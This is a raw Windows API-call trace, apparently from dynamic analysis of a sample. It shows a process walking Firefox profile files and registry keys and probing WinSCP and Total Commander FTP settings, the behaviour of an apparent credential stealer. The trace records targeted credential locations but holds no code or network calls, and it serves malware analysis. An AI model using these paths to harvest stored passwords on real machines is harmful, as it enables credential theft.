lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.998] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.998] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0x5b9b10 [0590.998] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.998] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 1 [0590.998] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.999] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.999] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0 [0590.999] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.999] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.999] LocalFree (hMem=0x56cab0) returned 0x0 [0590.999] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0 [0590.999] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.999] LocalFree (hMem=0x63bd28) returned 0x0 [0590.999] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.999] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.999] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0590.999] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.999] lstrlenW (lpString="\\") returned 1 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.999] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.999] lstrlenW (lpString="webapps") returned 7 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.999] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.999] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.999] lstrlenW (lpString="\\*.*") returned 4 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.999] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.999] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0x5b9b50 [0590.999] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.999] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.999] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.999] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.999] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.999] lstrlenW (lpString="\\") returned 1 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.999] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63be60 [0590.999] lstrlenW (lpString="webapps.json") returned 12 [0590.999] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0590.999] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.999] LocalFree (hMem=0x63be60) returned 0x0 [0590.999] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.999] CloseHandle (hObject=0x668) returned 1 [0590.999] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.999] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63fa18 [0590.999] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x63fa18, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0590.999] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0591.000] CloseHandle (hObject=0x668) returned 1 [0591.000] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0591.000] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0591.000] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0591.000] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0591.000] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0591.000] CloseHandle (hObject=0x66c) returned 1 [0591.000] CloseHandle (hObject=0x668) returned 1 [0591.000] LocalFree (hMem=0x63fa18) returned 0x0 [0591.000] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.000] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0 [0591.000] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.000] LocalFree (hMem=0x63bd28) returned 0x0 [0591.000] LocalFree (hMem=0x63bbf0) returned 0x0 [0591.000] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0591.000] lstrlenW (lpString="\\") returned 1 [0591.000] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.000] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0591.000] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0591.000] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.001] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0591.001] LocalFree (hMem=0x63d7d8) returned 0x0 [0591.001] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0591.001] CloseHandle (hObject=0x660) returned 1 [0591.001] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0591.001] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0591.001] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x5dbdf0, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0591.001] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0591.001] CloseHandle (hObject=0x660) returned 1 [0591.001] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0591.001] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0591.001] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0591.001] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0591.002] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0591.002] CloseHandle (hObject=0x668) returned 1 [0591.002] CloseHandle (hObject=0x660) returned 1 [0591.002] LocalFree (hMem=0x5dbdf0) returned 0x0 [0591.002] LocalFree (hMem=0x56cab0) returned 0x0 [0591.002] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 0 [0591.002] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.002] LocalFree (hMem=0x63d6b0) returned 0x0 [0591.002] LocalFree (hMem=0x63d588) returned 0x0 [0591.003] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd68 | out: lpFindFileData=0x52dd68) returned 0 [0591.003] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0591.003] LocalFree (hMem=0x5e6108) returned 0x0 [0591.003] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.003] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfe0 | out: lpFindFileData=0x52dfe0) returned 1 [0591.003] lstrlenW (lpString="\\") returned 1 [0591.003] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0591.003] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ba0 [0591.003] lstrlenW (lpString="profiles.ini") returned 12 [0591.003] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 51 [0591.003] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5d7c90 [0591.003] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0591.003] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0591.003] CloseHandle (hObject=0x5ac) returned 1 [0591.003] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x40 [0591.003] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5e6108 [0591.003] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x5e6108, nSize=0x40 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini") returned 0x40 [0591.003] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0591.003] CloseHandle (hObject=0x5ac) returned 1 [0591.003] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0591.003] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f [0591.003] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0591.003] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0591.003] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0591.004] CloseHandle (hObject=0x4c8) returned 1 [0591.004] CloseHandle (hObject=0x5ac) returned 1 [0591.004] LocalFree (hMem=0x5e6108) returned 0x0 [0591.004] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.004] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfe0 | out: lpFindFileData=0x52dfe0) returned 0 [0591.004] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0591.004] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.004] LocalFree (hMem=0x2ed2150) returned 0x0 [0591.004] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.004] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.004] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0591.004] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", phkResult=0x52e288 | out: phkResult=0x52e288*=0x664) returned 0x0 [0591.004] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e284, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e284, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0591.004] RegCloseKey (hKey=0x664) returned 0x0 [0591.004] LocalFree (hMem=0x2edc8d0) returned 0x0 [0591.004] LocalFree (hMem=0x2ed9860) returned 0x0 [0591.004] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0591.004] lstrlenW (lpString="\\") returned 1 [0591.004] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0591.004] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0591.004] lstrlenW (lpString="extensions") returned 10 [0591.004] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0591.004] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2ab0 [0591.004] LocalFree (hMem=0x597878) returned 0x0 [0591.004] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", lpSrch="Firefox") returned="Firefox 25.0\\extensions" [0591.004] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e260 | out: phkResult=0x52e260*=0x664) returned 0x0 [0591.004] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e248, lpData=0x0, lpcbData=0x52e25c*=0x0 | out: lpType=0x52e248*=0x0, lpData=0x0, lpcbData=0x52e25c*=0x0) returned 0x2 [0591.004] RegCloseKey (hKey=0x664) returned 0x0 [0591.004] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e234 | out: phkResult=0x52e234*=0x664) returned 0x0 [0591.004] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e21c, lpData=0x0, lpcbData=0x52e230*=0x0 | out: lpType=0x52e21c*=0x0, lpData=0x0, lpcbData=0x52e230*=0x0) returned 0x2 [0591.004] RegCloseKey (hKey=0x664) returned 0x0 [0591.005] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e208 | out: phkResult=0x52e208*=0x0) returned 0x2 [0591.005] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0591.005] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", phkResult=0x52e288 | out: phkResult=0x52e288*=0x664) returned 0x0 [0591.005] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e284, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e284, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0591.005] RegCloseKey (hKey=0x664) returned 0x0 [0591.005] LocalFree (hMem=0x2edc8d0) returned 0x0 [0591.005] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.005] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0591.005] RegCloseKey (hKey=0x2e4) returned 0x0 [0591.005] LocalFree (hMem=0x2edb848) returned 0x0 [0591.005] LocalFree (hMem=0x5977a0) returned 0x0 [0591.005] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x3, lpName=0x5e5080, lpcchName=0x52e2fc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x52e2fc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0591.005] RegCloseKey (hKey=0x4d0) returned 0x0 [0591.005] LocalFree (hMem=0x5e5080) returned 0x0 [0591.005] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x52d310 | out: phkResult=0x52d310*=0x0) returned 0x2 [0591.005] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x52d2f8 | out: phkResult=0x52d2f8*=0x0) returned 0x2 [0591.005] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.005] GetWindowsDirectoryW (in: lpBuffer=0x63f8c8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0591.005] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63fb60 [0591.005] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63fb60 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.005] lstrlenW (lpString="\\VirtualStore") returned 13 [0591.005] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.005] LocalAlloc (uFlags=0x40, uBytes=0xda) returned 0x2ed0060 [0591.005] LocalFree (hMem=0x63fb60) returned 0x0 [0591.005] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\") returned="\\Windows" [0591.005] lstrlenW (lpString="\\Windows") returned 8 [0591.005] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore") returned 44 [0591.005] LocalAlloc (uFlags=0x40, uBytes=0xea) returned 0x5e6f98 [0591.005] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.005] lstrlenW (lpString="") returned 0 [0591.005] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore\\Windows") returned 52 [0591.005] LocalAlloc (uFlags=0x40, uBytes=0xea) returned 0x59f8b0 [0591.005] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.005] lstrlenW (lpString="C:\\Windows") returned 10 [0591.005] lstrlenW (lpString="\\") returned 1 [0591.005] lstrlenW (lpString="C:\\Windows") returned 10 [0591.005] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0591.005] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.005] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f0 | out: phkResult=0x52e2f0*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e298 | out: phkResult=0x52e298*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2f0 | out: phkResult=0x52e2f0*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e298 | out: phkResult=0x52e298*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e4 | out: phkResult=0x52e2e4*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b8 | out: phkResult=0x52e2b8*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e28c | out: phkResult=0x52e28c*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e4 | out: phkResult=0x52e2e4*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b8 | out: phkResult=0x52e2b8*=0x0) returned 0x2 [0591.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e28c | out: phkResult=0x52e28c*=0x0) returned 0x2 [0591.006] lstrlenW (lpString="wcx_ftp.ini") returned 11 [0591.006] lstrlenW (lpString="C:\\Windows\\") returned 11 [0591.006] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0x2ed5118 [0591.007] CreateFileW (lpFileName="C:\\Windows\\wcx_ftp.ini" (normalized: "c:\\windows\\wcx_ftp.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.007] LocalFree (hMem=0x2ed5118) returned 0x0 [0591.007] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.007] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore\\Windows") returned 52 [0591.007] lstrlenW (lpString="\\") returned 1 [0591.007] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\VirtualStore\\Windows") returned 52 [0591.007] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0591.007] LocalFree (hMem=0x59f8b0) returned 0x0 [0591.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2bc | out: phkResult=0x52e2bc*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e290 | out: phkResult=0x52e290*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2bc | out: phkResult=0x52e2bc*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Ghisler\\Total Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e290 | out: phkResult=0x52e290*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2dc | out: phkResult=0x52e2dc*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2b0 | out: phkResult=0x52e2b0*=0x0) returned 0x2 [0591.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Ghisler\\Windows Commander", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e284 | out: phkResult=0x52e284*=0x0) returned 0x2 